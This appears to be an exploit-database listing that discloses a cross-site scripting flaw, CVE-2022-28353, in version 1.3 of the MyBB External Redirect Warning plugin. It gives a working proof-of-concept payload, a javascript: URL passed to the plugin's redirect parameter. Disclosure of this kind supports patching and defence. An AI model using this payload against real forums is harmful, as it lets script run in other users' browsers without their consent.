Exploit for MyBB External Redirect Warning 1.3 Cross Site Scripting CVE-2022-28353

Name: Exploit for MyBB External Redirect Warning 1.3 Cross Site Scripting CVE-2022-28353
Rating: 5 (135 reviews)

2023-03-20 | CVSS -0.4

## https://sploitus.com/exploit?id=PACKETSTORM:171403
# Exploit Title: MyBB External Redirect Warning Plugin 1.3 – Cross-Site Scripting  
# Date: February 1, 2021  
# Author: 0xB9  
# Twitter: @0xB9sec  
# Software Link: https://community.mybb.com/mods.php?action=view&pid=493  
# Version: 1.3  
# Tested On: Windows 10  
# CVE: CVE-2022-28353  
  
Description:  
This plugin notifies the user when they are being redirect to an off-site page. The redirect URL is vulnerable to XSS.  
  
Proof of Concept:  
  
– Go to the following URL… external.php?url=javascript:alert(1);  
– Click continue  
Payload will execute